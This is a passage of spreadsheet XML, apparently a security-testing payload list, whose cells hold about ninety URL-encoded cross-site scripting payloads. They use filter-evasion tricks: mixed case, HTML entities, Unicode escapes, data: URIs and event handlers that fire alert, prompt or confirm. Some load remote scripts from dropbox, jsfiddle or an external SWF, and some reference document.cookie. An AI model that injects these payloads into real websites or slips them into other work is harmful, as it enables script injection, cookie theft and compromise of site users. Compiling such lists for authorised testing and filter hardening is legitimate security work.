      </c>
      <c r="B1923" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2Fsrc%3D%60%60%20onerror%3Dthis.onerror%3Dconfirm%281%29</v>
      </c>
    </row>
    <row r="1924">
      <c r="A1924" s="3" t="s">
        <v>559</v>
      </c>
      <c r="B1924" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Cisindex%20formaction%3D%22javascript%26colon%3Bconfirm%281%29%22</v>
      </c>
    </row>
    <row r="1925">
      <c r="A1925" s="3" t="s">
        <v>1037</v>
      </c>
      <c r="B1925" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%60%60%26NewLine%3B%20onerror%3Dalert%281%29%26NewLine%3B</v>
      </c>
    </row>
    <row r="1926">
      <c r="A1926" s="3" t="s">
        <v>561</v>
      </c>
      <c r="B1926" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2F%26Tab%3B%20src%3D%27https%3A%2F%2Fdl.dropbox.com%2Fu%2F13018058%2Fjs.js%27%20%2F%26Tab%3B%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1927">
      <c r="A1927" s="3" t="s">
        <v>562</v>
      </c>
      <c r="B1927" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CScRipT%205-0%2A3%2B9%2F3%3D%3Eprompt%281%29%3C%2FScRipT%20giveanswerhere%3D%3F</v>
      </c>
    </row>
    <row r="1928">
      <c r="A1928" s="3" t="s">
        <v>563</v>
      </c>
      <c r="B1928" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fsrc%3D%22data%3Atext%2Fhtml%3B%26Tab%3Bbase64%26Tab%3B%2CPGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3D%3D%22%3E</v>
      </c>
    </row>
    <row r="1929">
      <c r="A1929" s="3" t="s">
        <v>1038</v>
      </c>
      <c r="B1929" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%2F%2A%2A%2F%3E%2F%2A%2A%2Falert%281%29%2F%2A%2A%2F%3C%2Fscript%20%2F%2A%2A%2F</v>
      </c>
    </row>
    <row r="1930">
      <c r="A1930" s="3" t="s">
        <v>1039</v>
      </c>
      <c r="B1930" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2334%3B%26%2362%3B%3Ch1%2Fonmouseover%3D%27%5Cu0061lert%281%29%27%3E</v>
      </c>
    </row>
    <row r="1931">
      <c r="A1931" s="3" t="s">
        <v>566</v>
      </c>
      <c r="B1931" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fsrc%3D%22data%3Atext%2Fhtml%2C%3Csvg%20%26%23111%3B%26%23110%3Bload%3Dalert%281%29%3E%22%3E</v>
      </c>
    </row>
    <row r="1932">
      <c r="A1932" s="3" t="s">
        <v>567</v>
      </c>
      <c r="B1932" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20content%3D%22%26NewLine%3B%201%20%26NewLine%3B%3B%20JAVASCRIPT%26colon%3B%20alert%281%29%22%20http-equiv%3D%22refresh%22%2F%3E</v>
      </c>
    </row>
    <row r="1933">
      <c r="A1933" s="3" t="s">
        <v>568</v>
      </c>
      <c r="B1933" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20xlink%3Ahref%3Ddata%26colon%3B%2Cwindow.open%28%27https%3A%2F%2Fwww.google.com%2F%27%29%3E%3C%2Fscript</v>
      </c>
    </row>
    <row r="1934">
      <c r="A1934" s="3" t="s">
        <v>569</v>
      </c>
      <c r="B1934" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20x%3Ahref%3D%27https%3A%2F%2Fdl.dropbox.com%2Fu%2F13018058%2Fjs.js%27%20%7BOpera%7D</v>
      </c>
    </row>
    <row r="1935">
      <c r="A1935" s="3" t="s">
        <v>570</v>
      </c>
      <c r="B1935" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Aconfirm%281%29%22%3E</v>
      </c>
    </row>
    <row r="1936">
      <c r="A1936" s="3" t="s">
        <v>571</v>
      </c>
      <c r="B1936" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Djavascript%26colon%3Balert%26lpar%3Bdocument%26period%3Blocation%26rpar%3B%3E</v>
      </c>
    </row>
    <row r="1937">
      <c r="A1937" s="3" t="s">
        <v>572</v>
      </c>
      <c r="B1937" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Ca%20href%3D%22javascript%3A%5Cu0061lert%26%23x28%3B1%26%23x29%3B%22%3EX</v>
      </c>
    </row>
    <row r="1938">
      <c r="A1938" s="3" t="s">
        <v>1055</v>
      </c>
      <c r="B1938" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fscript%3E%3Cimg%2F%2A%2Fsrc%3D%22worksinchrome%26colon%3Bprompt%26%23x28%3B1%26%23x29%3B%22%2F%2A%2Fonerror%3D%27eval%28src%29%27%3E</v>
      </c>
    </row>
    <row r="1939">
      <c r="A1939" s="3" t="s">
        <v>574</v>
      </c>
      <c r="B1939" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2F%26%2309%3B%26%2310%3B%26%2311%3B%20src%3D%60%7E%60%20onerror%3Dprompt%281%29%3E</v>
      </c>
    </row>
    <row r="1940">
      <c r="A1940" s="3" t="s">
        <v>575</v>
      </c>
      <c r="B1940" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Ciframe%20%26%2309%3B%26%2310%3B%26%2311%3B%20src%3D%22javascript%26%2358%3Balert%281%29%22%26%2311%3B%26%2310%3B%26%2309%3B%3B%3E</v>
      </c>
    </row>
    <row r="1941">
      <c r="A1941" s="3" t="s">
        <v>576</v>
      </c>
      <c r="B1941" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Aapplication%2Fx-x509-user-cert%3B%26NewLine%3Bbase64%26NewLine%3B%2CPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3D%3D%22%26%2309%3B%26%2310%3B%26%2311%3B%3EX%3C%2Fa</v>
      </c>
    </row>
    <row r="1942">
      <c r="A1942" s="3" t="s">
        <v>577</v>
      </c>
      <c r="B1942" s="4" t="str">
        <f t="shared" si="1"/>
        <v>http%3A%2F%2Fwww.google%3Cscript%20.com%3Ealert%28document.location%29%3C%2Fscript</v>
      </c>
    </row>
    <row r="1943">
      <c r="A1943" s="3" t="s">
        <v>578</v>
      </c>
      <c r="B1943" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%26%2332%3Bhref%26%2361%3B%26%2391%3B%26%2300%3B%26%2393%3B%22%26%2300%3B%20onmouseover%3Dprompt%26%2340%3B1%26%2341%3B%26%2347%3B%26%2347%3B%22%3EXYZ%3C%2Fa</v>
      </c>
    </row>
    <row r="1944">
      <c r="A1944" s="3" t="s">
        <v>579</v>
      </c>
      <c r="B1944" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2Fsrc%3D%40%26%2332%3B%26%2313%3B%20onerror%20%3D%20prompt%28%27%26%2349%3B%27%29</v>
      </c>
    </row>
    <row r="1945">
      <c r="A1945" s="3" t="s">
        <v>580</v>
      </c>
      <c r="B1945" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%2Fonload%3Dprompt%26%2340%3B%27%26%2388%3B%26%2383%3B%26%2383%3B%27%26%2341%3B</v>
      </c>
    </row>
    <row r="1946">
      <c r="A1946" s="3" t="s">
        <v>581</v>
      </c>
      <c r="B1946" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%5E__%5E%3Ealert%28String.fromCharCode%2849%29%29%3C%2Fscript%20%5E__%5E</v>
      </c>
    </row>
    <row r="1947">
      <c r="A1947" s="3" t="s">
        <v>582</v>
      </c>
      <c r="B1947" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fstyle%20%26%2332%3B%3E%3Cscript%20%26%2332%3B%20%3A-%28%3E%2F%2A%2A%2Falert%28document.location%29%2F%2A%2A%2F%3C%2Fscript%20%26%2332%3B%20%3A-%28</v>
      </c>
    </row>
    <row r="1948">
      <c r="A1948" s="3" t="s">
        <v>583</v>
      </c>
      <c r="B1948" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2300%3B%3C%2Fform%3E%3Cinput%20type%26%2361%3B%22date%22%20onfocus%3D%22alert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1949">
      <c r="A1949" s="3" t="s">
        <v>584</v>
      </c>
      <c r="B1949" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Ctextarea%20%26%2313%3B%20onkeyup%3D%27%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%26%23x28%3B1%26%23x29%3B%27%3E</v>
      </c>
    </row>
    <row r="1950">
      <c r="A1950" s="3" t="s">
        <v>585</v>
      </c>
      <c r="B1950" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%2F%2A%2A%2A%2F%3E%2F%2A%2A%2A%2Fconfirm%28%27%5CuFF41%5CuFF4C%5CuFF45%5CuFF52%5CuFF54%5Cu1455%5CuFF11%5Cu1450%27%29%2F%2A%2A%2A%2F%3C%2Fscript%20%2F%2A%2A%2A%2F</v>
      </c>
    </row>
    <row r="1951">
      <c r="A1951" s="3" t="s">
        <v>586</v>
      </c>
      <c r="B1951" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20srcdoc%3D%27%26lt%3Bbody%20onload%3Dprompt%26lpar%3B1%26rpar%3B%26gt%3B%27%3E</v>
      </c>
    </row>
    <row r="1952">
      <c r="A1952" s="3" t="s">
        <v>587</v>
      </c>
      <c r="B1952" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%3Avoid%280%29%22%20onmouseover%3D%26NewLine%3Bjavascript%3Aalert%281%29%26NewLine%3B%3EX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1953">
      <c r="A1953" s="3" t="s">
        <v>588</v>
      </c>
      <c r="B1953" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%7E%7E%7E%3Ealert%280%250%29%3C%2Fscript%20%7E%7E%7E%3E</v>
      </c>
    </row>
    <row r="1954">
      <c r="A1954" s="3" t="s">
        <v>589</v>
      </c>
      <c r="B1954" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%2Fonload%3D%26lt%3B%21--%26%2309%3B%26gt%3B%26%2310%3Balert%26%2310%3B%26lpar%3B1%26rpar%3B%3E</v>
      </c>
    </row>
    <row r="1955">
      <c r="A1955" s="3" t="s">
        <v>590</v>
      </c>
      <c r="B1955" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2F%2F%2Fstyle%2F%2F%2F%3E%3Cspan%20%252F%20onmousemove%3D%27alert%26lpar%3B1%26rpar%3B%27%3ESPAN</v>
      </c>
    </row>
    <row r="1956">
      <c r="A1956" s="3" t="s">
        <v>591</v>
      </c>
      <c r="B1956" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2Fsrc%3D%27http%3A%2F%2Fi.imgur.com%2FP8mL8.jpg%27%20onmouseover%3D%26Tab%3Bprompt%281%29</v>
      </c>
    </row>
    <row r="1957">
      <c r="A1957" s="3" t="s">
        <v>592</v>
      </c>
      <c r="B1957" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2334%3B%26%2362%3B%3Csvg%3E%3Cstyle%3E%7B-o-link-source%26colon%3B%27%3Cbody%2Fonload%3Dconfirm%281%29%3E%27</v>
      </c>
    </row>
    <row r="1958">
      <c r="A1958" s="3" t="s">
        <v>593</v>
      </c>
      <c r="B1958" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2313%3B%3Cblink%2F%26%2313%3B%20onmouseover%3Dpr%26%23x6F%3Bmp%26%23116%3B%281%29%3EOnMouseOver%20%7BFirefox%20%26%20Opera%7D</v>
      </c>
    </row>
    <row r="1959">
      <c r="A1959" s="3" t="s">
        <v>594</v>
      </c>
      <c r="B1959" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmarquee%20onstart%3D%27javascript%3Aalert%26%23x28%3B1%26%23x29%3B%27%3E%5E__%5E</v>
      </c>
    </row>
    <row r="1960">
      <c r="A1960" s="3" t="s">
        <v>595</v>
      </c>
      <c r="B1960" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%2Fstyle%3D%22width%3Aexpression%28confirm%281%29%29%22%3EX%3C%2Fdiv%3E%20%7BIE7%7D</v>
      </c>
    </row>
    <row r="1961">
      <c r="A1961" s="3" t="s">
        <v>1042</v>
      </c>
      <c r="B1961" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2F%2F%20src%3DjavaSCRIPT%26colon%3Balert%281%29</v>
      </c>
    </row>
    <row r="1962">
      <c r="A1962" s="3" t="s">
        <v>597</v>
      </c>
      <c r="B1962" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2F%3Cform%2Faction%3Djavascript%26%23x3A%3Balert%26lpar%3Bdocument%26period%3Bcookie%26rpar%3B%3E%3Cinput%2Ftype%3D%27submit%27%3E%2F%2F</v>
      </c>
    </row>
    <row r="1963">
      <c r="A1963" s="3" t="s">
        <v>598</v>
      </c>
      <c r="B1963" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2Aiframe%2Fsrc%2A%2F%3Ciframe%2Fsrc%3D%22%3Ciframe%2Fsrc%3D%40%22%2Fonload%3Dprompt%281%29%20%2F%2Aiframe%2Fsrc%2A%2F%3E</v>
      </c>
    </row>
    <row r="1964">
      <c r="A1964" s="3" t="s">
        <v>599</v>
      </c>
      <c r="B1964" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%2F%7C%5C%5C%20%3Cscript%20%2F%2F%7C%5C%5C%20src%3D%27https%3A%2F%2Fdl.dropbox.com%2Fu%2F13018058%2Fjs.js%27%3E%20%2F%2F%7C%5C%5C%20%3C%2Fscript%20%2F%2F%7C%5C%5C</v>
      </c>
    </row>
    <row r="1965">
      <c r="A1965" s="3" t="s">
        <v>600</v>
      </c>
      <c r="B1965" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Ffont%3E%2F%3Csvg%3E%3Cstyle%3E%7Bsrc%26%23x3A%3B%27%3Cstyle%2Fonload%3Dthis.onload%3Dconfirm%281%29%3E%27%3C%2Ffont%3E%2F%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="1966">
      <c r="A1966" s="3" t="s">
        <v>601</v>
      </c>
      <c r="B1966" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%2Fhref%3D%22javascript%3A%26%2313%3B%20javascript%3Aprompt%281%29%22%3E%3Cinput%20type%3D%22X%22%3E</v>
      </c>
    </row>
    <row r="1967">
      <c r="A1967" s="3" t="s">
        <v>602</v>
      </c>
      <c r="B1967" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fplaintext%5C%3E%3C%2F%7C%5C%3E%3Cplaintext%2Fonmouseover%3Dprompt%281%29</v>
      </c>
    </row>
    <row r="1968">
      <c r="A1968" s="3" t="s">
        <v>603</v>
      </c>
      <c r="B1968" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fsvg%3E%27%27%3Csvg%3E%3Cscript%20%27AQuickBrownFoxJumpsOverTheLazyDog%27%3Ealert%26%23x28%3B1%26%23x29%3B%20%7BOpera%7D</v>
      </c>
    </row>
    <row r="1969">
      <c r="A1969" s="3" t="s">
        <v>604</v>
      </c>
      <c r="B1969" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%26colon%3B%5Cu0061%26%23x6C%3B%26%23101%2572t%26lpar%3B1%26rpar%3B%22%3E%3Cbutton%3E</v>
      </c>
    </row>
    <row r="1970">
      <c r="A1970" s="3" t="s">
        <v>605</v>
      </c>
      <c r="B1970" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20onmouseover%3D%27alert%26lpar%3B1%26rpar%3B%27%3EDIV%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="1971">
      <c r="A1971" s="3" t="s">
        <v>606</v>
      </c>
      <c r="B1971" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20style%3D%22position%3Aabsolute%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%22%20onmouseover%3D%22prompt%281%29%22%3E</v>
      </c>
    </row>
    <row r="1972">
      <c r="A1972" s="3" t="s">
        <v>607</v>
      </c>
      <c r="B1972" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22jAvAsCrIpT%26colon%3Balert%26lpar%3B1%26rpar%3B%22%3EX%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1973">
      <c r="A1973" s="3" t="s">
        <v>608</v>
      </c>
      <c r="B1973" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20src%3D%22http%3A%2F%2Fcorkami.googlecode.com%2Fsvn%2F%21svn%2Fbc%2F480%2Ftrunk%2Fmisc%2Fpdf%2Fhelloworld_js_X.pdf%22%3E</v>
      </c>
    </row>
    <row r="1974">
      <c r="A1974" s="3" t="s">
        <v>609</v>
      </c>
      <c r="B1974" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3D%22http%3A%2F%2Fcorkami.googlecode.com%2Fsvn%2F%21svn%2Fbc%2F480%2Ftrunk%2Fmisc%2Fpdf%2Fhelloworld_js_X.pdf%22%3E</v>
      </c>
    </row>
    <row r="1975">
      <c r="A1975" s="3" t="s">
        <v>610</v>
      </c>
      <c r="B1975" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvar%20onmouseover%3D%22prompt%281%29%22%3EOn%20Mouse%20Over%3C%2Fvar%3E</v>
      </c>
    </row>
    <row r="1976">
      <c r="A1976" s="3" t="s">
        <v>611</v>
      </c>
      <c r="B1976" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3Djavascript%26colon%3Balert%26lpar%3Bdocument%26period%3Bcookie%26rpar%3B%3EClick%20Here%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1977">
      <c r="A1977" s="3" t="s">
        <v>612</v>
      </c>
      <c r="B1977" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22%2F%22%20%3D_%3D%22%20title%3D%22onerror%3D%27prompt%281%29%27%22%3E</v>
      </c>
    </row>
    <row r="1978">
      <c r="A1978" s="3" t="s">
        <v>613</v>
      </c>
      <c r="B1978" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%25%3C%21--%27%25%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%20--%3E</v>
      </c>
    </row>
    <row r="1979">
      <c r="A1979" s="3" t="s">
        <v>614</v>
      </c>
      <c r="B1979" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22data%3Atext%2Fjavascript%2Calert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1980">
      <c r="A1980" s="3" t="s">
        <v>615</v>
      </c>
      <c r="B1980" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fsrc%20%5C%2F%5C%2Fonload%20%3D%20prompt%281%29</v>
      </c>
    </row>
    <row r="1981">
      <c r="A1981" s="3" t="s">
        <v>616</v>
      </c>
      <c r="B1981" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fonreadystatechange%3Dalert%281%29</v>
      </c>
    </row>
    <row r="1982">
      <c r="A1982" s="3" t="s">
        <v>617</v>
      </c>
      <c r="B1982" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%2Fonload%3Dalert%281%29</v>
      </c>
    </row>
    <row r="1983">
      <c r="A1983" s="3" t="s">
        <v>618</v>
      </c>
      <c r="B1983" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20value%3D%3C%3E%3Ciframe%2Fsrc%3Djavascript%3Aconfirm%281%29</v>
      </c>
    </row>
    <row r="1984">
      <c r="A1984" s="3" t="s">
        <v>619</v>
      </c>
      <c r="B1984" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20type%3D%22text%22%20value%3D%60%60%20%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="1985">
      <c r="A1985" s="3" t="s">
        <v>623</v>
      </c>
      <c r="B1985" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dj%26Tab%3Ba%26Tab%3Bv%26Tab%3Ba%26Tab%3Bs%26Tab%3Bc%26Tab%3Br%26Tab%3Bi%26Tab%3Bp%26Tab%3Bt%26Tab%3B%3Aa%26Tab%3Bl%26Tab%3Be%26Tab%3Br%26Tab%3Bt%26Tab%3B%2528%26Tab%3B1%26Tab%3B%2529%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="1986">
      <c r="A1986" s="3" t="s">
        <v>624</v>
      </c>
      <c r="B1986" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%60xx%3Axx%60onerror%3Dalert%281%29%3E</v>
      </c>
    </row>
    <row r="1987">
      <c r="A1987" s="3" t="s">
        <v>625</v>
      </c>
      <c r="B1987" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20type%3D%22text%2Fx-scriptlet%22%20data%3D%22http%3A%2F%2Fjsfiddle.net%2FXLE63%2F%20%22%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="1988">
      <c r="A1988" s="3" t="s">
        <v>626</v>
      </c>
      <c r="B1988" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Bjavascript%26colon%3Balert%281%29%22%2F%3E</v>
      </c>
    </row>
    <row r="1989">
      <c r="A1989" s="3" t="s">
        <v>627</v>
      </c>
      <c r="B1989" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmath%3E%3Ca%20xlink%3Ahref%3D%22%2F%2Fjsfiddle.net%2Ft846h%2F%22%3Eclick</v>
      </c>
    </row>
    <row r="1990">
      <c r="A1990" s="3" t="s">
        <v>628</v>
      </c>
      <c r="B1990" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20code%3D%22http%3A%2F%2Fbusinessinfo.co.uk%2Flabs%2Fxss%2Fxss.swf%22%20allowscriptaccess%3Dalways%3E</v>
      </c>
    </row>
    <row r="1991">
      <c r="A1991" s="3" t="s">
        <v>629</v>
      </c>
      <c r="B1991" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20contentScriptType%3Dtext%2Fvbs%3E%3Cscript%3EMsgBox%2B1</v>
      </c>
    </row>
    <row r="1992">
      <c r="A1992" s="3" t="s">
        <v>630</v>
      </c>
      <c r="B1992" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22data%3Atext%2Fhtml%3Bbase64_%2C%3Csvg%2Fonload%3D%5Cu0061%26%23x6C%3B%26%23101%2572t%281%29%3E%22%3EX%3C%2Fa</v>
      </c>
    </row>
    <row r="1993">
      <c r="A1993" s="3" t="s">
        <v>631</v>
      </c>
      <c r="B1993" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%2Fonreadystatechange%3D%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%27%5Cu0061%27%29%20worksinIE%3E</v>
      </c>
    </row>
    <row r="1994">
      <c r="A1994" s="3" t="s">
        <v>632</v>
      </c>
      <c r="B1994" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%7E%27%5Cu0061%27%20%3B%20%5Cu0074%5Cu0068%5Cu0072%5Cu006F%5Cu0077%20%7E%20%5Cu0074%5Cu0068%5Cu0069%5Cu0073.%20%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%7E%27%5Cu0061%27%29%3C%2Fscript%20U%2B</v>
      </c>
    </row>
    <row r="1995">
      <c r="A1995" s="3" t="s">
        <v>633</v>
      </c>
      <c r="B1995" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3D%22data%26colon%3Btext%252Fj%5Cu0061v%5Cu0061script%2C%5Cu0061lert%28%27%5Cu0061%27%29%22%3E%3C%2Fscript%20a%3D%5Cu0061%20%26%20%2F%3D%252F</v>
      </c>
    </row>
    <row r="1996">
      <c r="A1996" s="3" t="s">
        <v>634</v>
      </c>
      <c r="B1996" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3Ddata%26colon%3Btext%2Fj%5Cu0061v%5Cu0061%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%2C%5Cu0061%256C%2565%2572%2574%28%2FXSS%2F%29%3E%3C%2Fscript</v>
      </c>
    </row>
    <row r="1997">
      <c r="A1997" s="3" t="s">
        <v>635</v>
      </c>
      <c r="B1997" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3Djavascript%26colon%3B%5Cu0061%26%23x6C%3B%26%23101%2572t%281%29%3E</v>
      </c>
    </row>
    <row r="1998">
      <c r="A1998" s="3" t="s">
        <v>636</v>
      </c>
      <c r="B1998" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%2B-%2B-1-%2B-%2Balert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1999">
      <c r="A1999" s="3" t="s">
        <v>637</v>
      </c>
      <c r="B1999" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%2Fonload%3D%26lt%3B%21--%26gt%3B%26%2310alert%281%29%3E</v>
      </c>
    </row>
    <row r="2000">
      <c r="A2000" s="3" t="s">
        <v>638</v>
      </c>
      <c r="B2000" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20itworksinallbrowsers%3E%2F%2A%3Cscript%2A%20%2A%2Falert%281%29%3C%2Fscript</v>
      </c>
    </row>
    <row r="2001">
      <c r="A2001" s="3" t="s">
        <v>639</v>
      </c>
      <c r="B2001" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%20%3Fitworksonchrome%3F%5C%2Fonerror%20%3D%20alert%281%29</v>
      </c>
    </row>
    <row r="2002">
      <c r="A2002" s="3" t="s">
        <v>640</v>
      </c>
      <c r="B2002" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%3E%2F%2F%26NewLine%3Bconfirm%281%29%3B%3C%2Fscript%20%3C%2Fsvg%3E</v>
      </c>
    </row>
    <row r="2003">
      <c r="A2003" s="3" t="s">
        <v>641</v>
      </c>
      <c r="B2003" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%3E%3Cscript%20onlypossibleinopera%3A-%29%3E%20alert%281%29</v>
      </c>
    </row>
    <row r="2004">
      <c r="A2004" s="3" t="s">
        <v>642</v>
      </c>
      <c r="B2004" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20aaaaaaaaa%20aaaaaaaaaa%20href%3Dj%26%2397v%26%2397script%26%23x3A%3B%26%2397lert%281%29%3EClickMe</v>
      </c>
    </row>
    <row r="2005">
      <c r="A2005" s="3" t="s">
        <v>643</v>
      </c>
      <c r="B2005" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20x%3E%20alert%281%29%20%3C%2Fscript%201%3D2</v>
      </c>
    </row>
    <row r="2006">
      <c r="A2006" s="3" t="s">
        <v>644</v>
      </c>
      <c r="B2006" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3E%20style%3D%22x%3A%22%3E</v>
      </c>
    </row>
    <row r="2007">
      <c r="A2007" s="3" t="s">
        <v>645</v>
      </c>
      <c r="B2007" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C--%60%3Cimg%2Fsrc%3D%60%20onerror%3Dalert%281%29%3E%20--%21%3E</v>
      </c>
    </row>
    <row r="2008">
      <c r="A2008" s="3" t="s">
        <v>646</v>
      </c>
      <c r="B2008" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3D%26%23100%26%2397%26%23116%26%2397%3Atext%2F%26%23x6a%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x000070%26%23x074%2C%26%23x0061%3B%26%23x06c%3B%26%23x0065%3B%26%23x00000072%3B%26%23x00074%3B%281%29%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2009">
      <c r="A2009" s="3" t="s">
        <v>647</v>
      </c>
      <c r="B2009" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3D%22position%3Aabsolute%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%22%20onmouseover%3D%22prompt%281%29%22%20onclick%3D%22alert%281%29%22%3Ex%3C%2Fbutton%3E</v>
      </c>
    </row>
    <row r="2010">
      <c r="A2010" s="3" t="s">
        <v>648</v>
      </c>
      <c r="B2010" s="4" t="str">
        <f t="shared" si="1"/>
